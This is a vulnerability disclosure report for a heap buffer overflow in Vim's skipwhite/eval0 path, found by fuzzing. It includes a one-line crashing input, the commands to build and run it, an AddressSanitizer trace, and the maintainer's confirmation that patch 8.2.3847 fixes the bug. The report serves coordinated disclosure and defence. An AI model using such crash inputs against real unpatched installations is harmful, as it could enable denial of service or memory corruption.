Heap-based Buffer Overflow in vim/vim

Valid

Reported on

Dec 17th 2021


✍️ Description

When fuzzing vim commit cd2f8f0e0 (works with latest build and latest commit 7c0fb8003 per this time of this report) v8.2.3811 with clang 13 and ASan, I discovered a heap buffer overflow.

Proof of Concept

Here is the poc

ev0->(

How to build

LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
make -j$(nproc)

Proof of Concept

Run crafted file with this command

./vim -u NONE -X -Z -e -s -S poc_skipwhite -c :qa!

ASan stack trace:

aldo@vps:~/vim-8.2.3635/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_skipwhite -c :qa!
=================================================================
==355566==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000006538 at pc 0x0000013d15ae bp 0x7fffffff8910 sp 0x7fffffff8908
READ of size 1 at 0x602000006538 thread T0
    #0 0x13d15ad in skipwhite /root/vimafl/src/charset.c:1469:12
    #1 0x6b186b in eval0 /root/vimafl/src/eval.c:2230:9
    #2 0x834eeb in ex_eval /root/vimafl/src/ex_eval.c:940:9
    #3 0x7dbd89 in do_one_cmd /root/vimafl/src/ex_docmd.c:2578:2
    #4 0x7c9035 in do_cmdline /root/vimafl/src/ex_docmd.c:1000:17
    #5 0xe5a6a9 in do_source /root/vimafl/src/scriptfile.c:1420:5
    #6 0xe56e45 in cmd_source /root/vimafl/src/scriptfile.c:985:14
    #7 0xe56a2e in ex_source /root/vimafl/src/scriptfile.c:1011:2
    #8 0x7dbd89 in do_one_cmd /root/vimafl/src/ex_docmd.c:2578:2
    #9 0x7c9035 in do_cmdline /root/vimafl/src/ex_docmd.c:1000:17
    #10 0x7cdc71 in do_cmdline_cmd /root/vimafl/src/ex_docmd.c:594:12
    #11 0x13f46c2 in exe_commands /root/vimafl/src/main.c:3080:2
    #12 0x13f084d in vim_main2 /root/vimafl/src/main.c:774:2
    #13 0x13e5c71 in main /root/vimafl/src/main.c:426:12
    #14 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #15 0x41fe1d in _start (/root/vimafl/src/vim+0x41fe1d)

0x602000006538 is located 0 bytes to the right of 8-byte region [0x602000006530,0x602000006538)
allocated by thread T0 here:
    #0 0x49c5cd in __interceptor_malloc (/root/vimafl/src/vim+0x49c5cd)
    #1 0x4ce952 in lalloc /root/vimafl/src/alloc.c:244:11
    #2 0x4ce83a in alloc /root/vimafl/src/alloc.c:151:12
    #3 0xf88136 in vim_strsave /root/vimafl/src/strings.c:27:9
    #4 0x7c83d5 in do_cmdline /root/vimafl/src/ex_docmd.c:918:21
    #5 0xe5a6a9 in do_source /root/vimafl/src/scriptfile.c:1420:5
    #6 0xe56e45 in cmd_source /root/vimafl/src/scriptfile.c:985:14
    #7 0xe56a2e in ex_source /root/vimafl/src/scriptfile.c:1011:2
    #8 0x7dbd89 in do_one_cmd /root/vimafl/src/ex_docmd.c:2578:2
    #9 0x7c9035 in do_cmdline /root/vimafl/src/ex_docmd.c:1000:17
    #10 0x7cdc71 in do_cmdline_cmd /root/vimafl/src/ex_docmd.c:594:12
    #11 0x13f46c2 in exe_commands /root/vimafl/src/main.c:3080:2
    #12 0x13f084d in vim_main2 /root/vimafl/src/main.c:774:2
    #13 0x13e5c71 in main /root/vimafl/src/main.c:426:12
    #14 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/vimafl/src/charset.c:1469:12 in skipwhite
Shadow bytes around the buggy address:
  0x0c047fff8c50: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff8c60: fa fa fd fa fa fa 06 fa fa fa fd fa fa fa fd fa
  0x0c047fff8c70: fa fa 07 fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff8c80: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff8c90: fa fa fd fa fa fa fd fa fa fa 00 00 fa fa 00 00
=>0x0c047fff8ca0: fa fa 05 fa fa fa 00[fa]fa fa fd fd fa fa 00 03
  0x0c047fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==355566==ABORTING

💥 Impact

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution

We are processing your report and will contact the vim team within 24 hours. a month ago
We have contacted a member of the vim team and are waiting to hear back a month ago
Bram Moolenaar validated this vulnerability a month ago
Muhammad Aldo Firmansyah has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bram Moolenaar
a month ago

Maintainer


Easy to reproduce. Turned the POC into a test which shows the problem with valgrind. Patch 8.2.3847 fixes it.

Bram Moolenaar confirmed that a fix has been merged on 605ec9 a month ago
Bram Moolenaar has been awarded the fix bounty